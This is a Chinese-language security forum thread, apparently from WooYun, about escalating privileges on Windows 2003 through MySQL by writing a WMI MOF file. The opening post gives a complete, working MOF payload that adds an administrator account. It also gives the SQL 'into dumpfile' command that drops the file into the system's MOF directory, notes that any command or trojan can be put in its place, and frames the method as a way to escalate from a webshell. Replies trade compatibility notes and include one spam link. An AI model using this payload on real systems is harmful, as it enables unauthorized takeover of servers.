当前位置:WooYun(白帽子技术社区) >> 渗透测试 >> About Mysql的那个提权漏洞、

About Mysql的那个提权漏洞、

cnrstar (Be My Personal Best!) | 2012-12-03 15:25

这个:MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day
http://www.exploit-db.com/exploits/23083/
大致看了一下,原来是在导出文件的时候出的问题,具体怎么出的问题,表示看mysql的源码不是我能看的来的。。
大家都知道,要对方开启mysql的外联,并且有root密码,这种情况只能用来扫肉鸡了,还蛋疼的不行。所以我感觉用在webshell下辅助提权不错,毕竟如果导udf什么相对麻烦了一些。所以就有下面的利用:
1.找个可写目录,我这里是C:\recycler\,把如下代码写到nullevt.mof文件里(也就是他源码里的payload):
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
注意上面的net.exe user admin admin /add,可以随便改的,想执行啥都行,有没有参数也都行,执行自己的马也行。
再然后,在菜刀里连接mysql数据库后执行:
select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
123(1).jpg

再然后。。你会发现用户添加上去了。
注:测试环境为windows 2003 + mysql 5.0.45-community-nt
win7旗舰版 sp1 + mysql-5.5.28 测试失败,2008未测试。
不过那个利用ADS新建\lib\plugin目录的bug还在,还可以利用那个去导udf提权的。

分享到:
36 个回复
  1. 1#
    回复此人 感谢
    笔墨 (好人一生平胸) | 2012-12-03 15:57

    “要对方开启mysql的外联,并且有root密码”   这个洞可以无视了- -

  2. 2#
    回复此人 感谢
    cnrstar (Be My Personal Best!) | 2012-12-03 16:03

    @笔墨 所以说辅助提权有点用。。悲催。。

  3. 3#
    回复此人 感谢
    open (心佛即佛,心魔即魔.) | 2012-12-03 16:06

    厉害!

  4. 4#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2012-12-03 16:14

    图裂了 摔!

  5. 5#
    回复此人 感谢
    cnrstar (Be My Personal Best!) | 2012-12-03 16:29

    @xsser 我用FF传的?怎么回事?我这也裂了。。

  6. 6#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2012-12-03 16:30

    @cnrstar 给我份 我传下

  7. 7#
    回复此人 感谢
    GaRY | 2012-12-03 17:23

    其实关于这个提权,谁可以写篇关于WMI和MOF文件为啥能执行的科普

  8. 8#
    回复此人 感谢
    horseluke (微碌) | 2012-12-03 17:49

    @GaRY Kingcope还放了一个《FreeFTPD Remote Authentication Bypass Zeroday Exploit (Stuxnet technique)》:
    http://seclists.org/fulldisclosure/2012/Dec/10

    很好奇Stuxnet technique是什么意思...

  9. 9#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2012-12-03 17:49

    另外,其实很多人嫌了解授权麻烦,经常grant *的

  10. 10# 感谢(2)
    回复此人 感谢
    gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-12-03 19:03

    楼主,我看好你~~

  11. 11#
    回复此人 感谢
    solihat (xxooooxx) | 2012-12-03 19:14

    @horseluke 专门针对工业控制系统编写的破坏性病毒Stuxnet使用的0day/技术

  12. 12#
    回复此人 感谢
    cnrstar (Be My Personal Best!) | 2012-12-03 20:11

    @gainover 多谢二哥、顿时搞站有精神了。

  13. 13#
    回复此人 感谢
    一刀终情 ((注意看时间,没乱哦!) ‫(1314520)) | 2012-12-03 22:25

    @xsser 真有这么授权的么……好霸气

  14. 14#
    回复此人 感谢
    B1n4ry (苦逼的生存着。。。) | 2012-12-03 22:30

    有木有人研究怎么阻止用户不停的添加呢。 清除所有文件依然不能阻止啊。 不停的添加该用户···

  15. 15#
    回复此人 感谢
    鬼哥 | 2012-12-03 22:45

    @B1n4ry 我也是想问这个郁闷。。刚自己测试 现在停不了苦恼中。

  16. 16#
    回复此人 感谢
    B1n4ry (苦逼的生存着。。。) | 2012-12-03 23:03

    @鬼哥 自己看了下似乎解决了,执行net stop winmgmt 然后删除文件即可。

  17. 17#
    回复此人 感谢
    鬼哥 | 2012-12-03 23:34

    @B1n4ry net stop winmgmt 执行了,删除了C:\WINDOWS\system32\wbem\mof下的文件,怎么再启动服务又 加了

  18. 18#
    回复此人 感谢
    GaRY | 2012-12-04 09:51

    @horseluke 就是“超级工厂”中所使用的技术

  19. 19#
    回复此人 感谢
    海豚1号 (只准自己装B见不得别人装逼) | 2012-12-04 11:11

    如果我有root and  密码 能外联  提什么权,不懂求解释!

  20. 20#
    回复此人 感谢
    hack2012 (www.waitalone.cn) | 2012-12-04 11:12

    很不错。。。

  21. 21#
    回复此人 感谢
    xsjswt | 2012-12-04 11:26

    @海豚1号 楼主说的就是你这个意思。这个东西只是一个辅助提权而已

  22. 22#
    回复此人 感谢
    海豚1号 (只准自己装B见不得别人装逼) | 2012-12-04 11:51

    root 密码这种估计也只有自己搭的虚拟机上有,能碰到root连数据库的都爽死了,从来不提权。

  23. 23#
    回复此人 感谢
    clzzy (南无阿弥陀佛) | 2012-12-04 12:39

    有root不都脱裤了么?能修改数据库不久基本掌握整个网站了么?

  24. 24#
    回复此人 感谢
    clzzy (南无阿弥陀佛) | 2012-12-04 12:39

    5.1.5表示提权失败

  25. 25#
    回复此人 感谢
    cnrstar (Be My Personal Best!) | 2012-12-04 13:44

    @clzzy http://zone.wooyun.org/content/1806  这个不是mysql的问题,是windows的问题,mysql全版本,只要有file权限的账号都可以用来提权。当然,目标必须是2003,2008之后不再支持那种直接拖进去就执行的方法,故而失效。

  26. 26#
    回复此人 感谢
    teamtopkarl | 2012-12-11 07:41

    利用低权限帐号秒破ROOT密码,然后再利用这个漏洞

  27. 27#
    回复此人 感谢
    f19ht | 2012-12-15 03:09

    @teamtopkarl 有方法吗?低权限能秒杀root?

  28. 28#
    回复此人 感谢
    if、so | 2012-12-17 19:40

    mark,一般装了mysql会有myd文件的,这是exp提权外的又一大杀器

  29. 29#
    回复此人 感谢
    xfkxfk | 2013-05-17 12:52

    为什么mof提权是,xx.mof文件上传后跑到mof目录下的good和bad目录下了
    郁闷
    结果没执行mof
    什么情况啊

  30. 30#
    回复此人 感谢
    走火入魔 (要致富!先脱裤!) | 2014-01-19 19:12

    我喜欢 内网渗透 很给力

  31. 31#
    回复此人 感谢
    0xTback | 2014-02-23 17:41

    一定要开外链??

  32. 32#
    回复此人 感谢
    Backer Hack | 2014-02-23 20:44

    跟一年前的windows提权0day差不多吧。。  MOF这玩意用处好像有点大

  33. 33#
    回复此人 感谢
    tensor (花式撸管,撸出美好明天。) | 2014-03-17 23:06

    win2008 r2 x64 测试失败

  34. 34#
    回复此人 感谢
    cnrstar (Be My Personal Best!) | 2014-03-18 09:35

    @tensor 肯定失败,在vista往上的版本里这个特性被禁了

  35. 35#
    回复此人 感谢
    Xiao_C | 2014-03-18 20:03

    上次给我说了过后,试了下,还是挺好用的。。。。

  36. 36#
    回复此人 感谢
    萧然 (喜欢一切美的东西·) | 2014-03-18 21:48

    <font size="6"><font color="#000000">点击此处免费刮开<font style="background-color:#000">http://url.cn/</font></font></font>

  37. 37#
    回复此人 感谢
    马丁 (我快要饿死了!!!!) | 2014-05-06 16:53

    没有 WScript.Shell组件怎么破?

  38. 38#
    回复此人 感谢
    doubi (漫漫长路远,悠悠冷梦清,人世里一场修行) | 2014-08-21 11:54

    怎么在 C:\\RECYCLER\\nullevt.mof 写文件,无shell,只有Navicat for mysql 外链。

  39. 39#
    回复此人 感谢
    风炫 (没有对象new一个) | 2014-12-22 22:27

    win2k3+mysql 5.1.62-community
    测试不通过

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容


Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1